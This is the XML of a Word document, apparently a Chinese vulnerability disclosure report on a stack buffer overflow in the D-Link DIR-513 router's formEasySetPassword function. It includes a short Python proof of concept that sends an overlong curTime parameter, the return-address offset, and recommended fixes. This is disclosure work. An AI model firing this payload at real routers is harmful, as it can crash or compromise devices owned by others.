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C7020">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>漏洞所属类型：通用型漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA67741">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>漏洞厂商：Dlink</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAF49CE">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>厂商官网：</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.dlink.com.cn/" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>https://www.dlink.com.cn/</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="547C0827">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>影响对象类型：网络设备（交换机、路由器等网络设备）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107A7959">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>影响产品：DIR-513</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C72BCB9">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>影响产品版本：A1FW110，A2FW110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E35527">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>是否产品组件漏洞：否</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C22296">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>漏洞名称：Dlink DIR-513 formEasySetPassword函数存在缓冲区溢出漏洞 存在 二进制 漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0614E2AF">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>版本号：1.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6508698F">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>触发位置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6A93E4">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>网络服务程序的 formEasySetPassword 函数（地址：0x4439b4）中，sprintf(v11, "/Basic/Wizard_Easy_Timezone.asp?t=%s", Var); 语句处。触发条件为：通过 HTTP POST 请求发送超长的 curTime 参数，且 language 参数不为 "SC" 或 "TW" 时触发该漏洞分支。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3F0B53">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Poc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCFC995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import requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2233BF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import struct</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0814CF45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2B6919E5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目标配置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFF3CFC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TARGET_IP = "192.168.0.1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BADBC7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URL = f"http://{TARGET_IP}/goform/formEasySetPassword"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236EFAC1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4E705D2B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计算偏移量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407A481E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OFFSET_TO_RETURN_ADDR = 172  # 从 v11 到返回地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517FAC2C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FORMAT_STR_LEN = 36          # 格式化字符串长度</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8DDDBC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PADDING_LEN = OFFSET_TO_RETURN_ADDR - FORMAT_STR_LEN + 50 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C77585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646BA81A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构造 Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507A6284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padding = b'A' * PADDING_LEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A922FBF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72C7DAFD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payload = padding </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC6CBDD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1B389E21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构造 HTTP 请求</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FCADDF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注意：language 不能是 "SC" 或 "TW"，否则不会触发漏洞分支</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068B206B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data = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3719199D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"curTime": payload,  # 使用 latin-1 编码保留所有字节</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271C72D3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"language": "EN",  # 确保触发漏洞分支</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6EF5C5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"config.password": "test123",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9F1BF0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"config.user_password": "test123"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BDC536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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A30BB0C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53B3D2D1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发送请求</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB1AF1F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response = requests.post(URL, data=data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5012E0D2">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
        </w:rPr>
        <w:t>print(f"Response Status: {response.status_code}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCEC63C">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEDE4C1">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>【Dlink DIR-513 是一款由 D-Link 生产的网络路由器设备】；Dlink DIR-513 的 Web 服务在处理表单请求时存在栈缓冲区溢出漏洞。在 formEasySetPassword 函数中，程序通过 websGetVar 获取用户可控的 curTime 参数，且未进行长度限制。当 language 参数不等于 "SC" 且不等于 "TW" 时，程序会调用无边界检查的 sprintf 函数，将超长的 curTime 直接拼接到大小固定为 104 字节的栈缓冲区 v11 中。攻击者可通过发送精心构造的恶意 POST 请求，造成栈溢出并覆盖相距 172 字节的函数返回地址，最终导致设备拒绝服务或远程代码执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD9F43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临时解决方案：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63530569">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>1.添加对 curTime 参数的长度校验，限制其长度（例如不超过 60 字节），并在验证失败时拒绝请求。 2.在网络边界处部署 WAF 或流量监控规则，拦截向 /formEasySetPassword 接口发送的、curTime 参数异常超长的恶意 POST 请求。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF2111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正式解决方案：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9E1556">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>将存在溢出风险的 sprintf 替换为安全的边界检查函数：snprintf(v11, sizeof(v11), "/Basic/Wizard_Easy_Timezone.asp?t=%s", Var);。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3317948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80532"/>
    <w:rsid w:val="0F410148"/>
    <w:rsid w:val="0F8327D4"/>
    <w:rsid w:val="119277C2"/>
    <w:rsid w:val="1360023A"/>
    <w:rsid w:val="13E57E77"/>
    <w:rsid w:val="1730412D"/>
    <w:rsid w:val="19AD6C87"/>
    <w:rsid w:val="1C7714BC"/>
    <w:rsid w:val="1E187177"/>
    <w:rsid w:val="229F6CCB"/>
    <w:rsid w:val="255C2DA7"/>
    <w:rsid w:val="2A634E12"/>
    <w:rsid w:val="2AA56E6E"/>
    <w:rsid w:val="2B6A2102"/>
    <w:rsid w:val="31846DBA"/>
    <w:rsid w:val="320E5A27"/>
    <w:rsid w:val="362464E4"/>
    <w:rsid w:val="3AEB1C36"/>
    <w:rsid w:val="3AF67FC7"/>
    <w:rsid w:val="3FD02685"/>
    <w:rsid w:val="405D49E1"/>
    <w:rsid w:val="451F5D1B"/>
    <w:rsid w:val="4F5E7594"/>
    <w:rsid w:val="4F81067C"/>
    <w:rsid w:val="51027351"/>
    <w:rsid w:val="515E35EA"/>
    <w:rsid w:val="592129AE"/>
    <w:rsid w:val="59DC7324"/>
    <w:rsid w:val="5A984179"/>
    <w:rsid w:val="5F5A2395"/>
    <w:rsid w:val="61F56D34"/>
    <w:rsid w:val="65152A31"/>
    <w:rsid w:val="66056C42"/>
    <w:rsid w:val="66435317"/>
    <w:rsid w:val="6C601188"/>
    <w:rsid w:val="6D4C1CEF"/>
    <w:rsid w:val="6E28207D"/>
    <w:rsid w:val="6F10538F"/>
    <w:rsid w:val="72C526D2"/>
    <w:rsid w:val="72FC5600"/>
    <w:rsid w:val="7A1D4386"/>
    <w:rsid w:val="7AF9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2025-05-04T12:22:00Z</dcterms:created>
  <dc:creator>17500</dc:creator>
  <cp:lastModifiedBy>王冠霖</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-05T15:07:54Z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75A104022DC848F1B64B95E543896397_12</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOTemplateDocerSaveRecord">
    <vt:lpwstr>eyJoZGlkIjoiNDhiZWYyZmNmM2IzODlmNjBlN2RjNmM1ZmQ2OTYwOWIiLCJ1c2VySWQiOiIxNTUzNzY5MTE0In0=</vt:lpwstr>
  </property>
</Properties>
</file>